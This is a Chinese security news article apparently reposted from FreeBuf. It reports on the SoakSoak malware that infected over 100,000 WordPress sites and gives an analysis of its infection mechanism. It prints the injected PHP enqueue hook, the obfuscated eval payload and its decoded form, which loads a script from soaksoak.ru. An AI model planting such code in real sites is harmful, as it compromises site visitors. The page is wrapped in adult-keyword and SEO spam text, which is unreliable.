成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

惡意軟件SoakSoak感染超10萬WordPress網站

安全
近幾個月,WordPress安全漏洞事件頻發,包括免費主題暗藏后門,波及WordPress等知名CMS系統,WordPress 4.0以下版本存在跨站腳本漏洞。而現在,一款廣泛傳播的惡意軟件已經感染了100,000多個WordPress網站,而且數字仍在增加。

WordPress是一款使用PHP語言開發的博客平臺,用戶架設屬于自己的博客,也可以把WordPress當作一個內容管理系統(CMS)來使用。近幾個月,WordPress安全漏洞事件頻發,包括免費主題暗藏后門,波及WordPress等知名CMS系統,WordPress 4.0以下版本存在跨站腳本漏洞。而現在,一款廣泛傳播的惡意軟件已經感染了100,000多個WordPress網站,而且數字仍在增加。

惡意軟件SoakSoak感染超10萬WordPress網站

Google將超過11,000個域名納入黑名單

消息先是周日早上在WordPress社區傳播,起因是Google將超過11,000域名列入黑名單,這些網站都被一款最新的惡意軟件攻擊,軟件來源于SoakSoak.ru,所以起名為SoakSoak 惡意軟件。由于現在互聯網上有超過7億網站使用WordPress,所以這樣的惡意軟件影響巨大。

一經感染,網站就會出現異常行為,包括重定向到SoakSoak.ru。訪問網站的用戶也可能會自動下載惡意程序。Google已經將11,000個可能已經感染病毒的網站列入黑名單。

惡意軟件SoakSoak感染超10萬WordPress網站

惡意軟件分析

惡意軟件SoakSoak會修改wp-includes/template-loader.php文件

  1. <?php  
  2. function FuncQueueObject()  
  3. {  
  4.   wp_enqueue_script("swfobject");  
  5. }  
  6. add_action("wp_enqueue_scripts",'FuncQueueObject'); 

這樣使得wp-includes/js/swobject.js文件會在每一個頁面上加載,這個swobject.js文件包含加密的惡意js代碼。

  1. eval(decodeURIComponent   
  2. ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B")); 

解密后的代碼:

  1. eval(decodeURIComponent('(  
  2. function()  
  3. {  
  4.     //var ua = navigator.userAgent.toLowerCase();  
  5.     //if (ua.indexOf('chrome') != -1) return;  
  6.     var head=document.getElementsByTagName('head')[0];  
  7.     var script=document.createElement('script');  
  8.     script.type='text/javascript';  
  9.     script.src='http://soaksoak.ru/xteas/code';  
  10.     script.id='xxyyzz_petushok';  
  11.     head.appendChild(script);  
  12. }()  
  13. );')); 

惡意代碼一旦被解密,就會加載SoakSoak.ru域名中的js:hxxp://soaksoak.ru/xteas/code

檢測與預防

目前尚不清楚病毒是如何感染網站的。如果你正在使用WordPress,并且你擔心你的網站被感染,Sucuri公司提供了免費網站掃描,你可以檢測你的網站是否感染了病毒。

惡意軟件SoakSoak感染超10萬WordPress網站

想要讓你的WordPress更加安全,可參見:如何為WordPress做安全防護?

參考來源:THN & Sucuri

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2013-04-16 17:15:37

移動惡意軟件惡意軟件Android

2015-02-09 10:14:33

2014-12-30 10:33:45

2021-04-02 12:58:50

WordPress惡意軟件jQuery Migr

2021-12-29 12:49:02

惡意軟件joker攻擊

2017-01-17 16:01:13

2023-10-27 12:14:24

2014-10-08 09:54:04

惡意軟件iWormMac

2023-08-18 10:14:27

2014-11-04 09:40:27

2019-12-11 07:29:34

惡意軟件漏洞攻擊

2012-07-09 08:46:44

Android病毒

2012-04-23 09:35:27

2016-09-07 12:44:43

2019-02-19 12:29:51

2023-05-30 20:25:38

2023-05-31 13:00:34

2021-10-06 13:57:41

惡意軟件GriftHorse網絡攻擊

2022-01-20 08:19:18

惡意軟件DDoS網絡攻擊

2011-05-17 17:30:38

微軟Windows 7惡意軟件
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 精品婷婷| 毛片区| 日本免费视频在线观看 | 亚洲日本视频 | 精品麻豆剧传媒av国产九九九 | 日韩视频区 | 欧美性生活免费 | 亚洲一区二区视频在线播放 | 精品国产一区二区三区久久久久久 | 日本不卡一区二区三区在线观看 | 亚洲一区二区三区视频 | 欧美啊v在线观看 | 中文字幕不卡在线88 | 国产精品一区二区三区99 | 久久一区二区精品 | 精品国产乱码久久久久久牛牛 | 华丽的挑战在线观看 | 一区二区三区在线免费观看 | 爱爱爱av| 久久久人成影片免费观看 | 日韩欧美在 | 国产成人99久久亚洲综合精品 | 一区二区成人 | 国产一区二区精品在线观看 | 91视频国产一区 | 日韩欧美在线视频 | a级黄色毛片免费播放视频 国产精品视频在线观看 | 在线看av网址 | 亚洲精品乱 | 爱爱小视频 | 在线黄色网 | 久久精品视频在线免费观看 | 婷婷色在线播放 | 精品91| 日本a网站 | 日日干干夜夜 | 福利片在线| 亚洲永久精品国产 | 精品国产青草久久久久福利 | 国产精品久久久久久久三级 | 日日夜夜草 |